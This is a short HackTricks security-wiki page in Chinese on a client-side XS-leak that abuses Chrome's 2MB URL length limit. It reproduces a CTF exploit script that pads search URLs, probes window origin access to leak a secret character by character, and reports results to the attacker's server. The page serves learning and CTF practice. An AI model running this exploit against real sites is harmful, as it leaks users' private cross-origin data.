URL Max Length - Client Side

从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)

来自https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit

<html>
<body></body>
<script>
(async () => {

const curr = "http://secrets.wtl.pw/search?query=HackTM{"

const leak = async (char) => {

fetch("/?try=" + char)
let w = window.open(curr + char +  "#" + "A".repeat(2 * 1024 * 1024 - curr.length - 2))

const check = async () => {
try {
w.origin
} catch {
fetch("/?nope=" + char)
return
}
setTimeout(check, 100)
}
check()
}

const CHARSET = "abcdefghijklmnopqrstuvwxyz-_0123456789"

for (let i = 0; i < CHARSET.length; i++) {
leak(CHARSET[i])
await new Promise(resolve => setTimeout(resolve, 50))
}
})()
</script>
</html>

服务器端:

从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)
上一页Cookie Bomb + Onerror XS Leak下一页performance.now example

最后更新于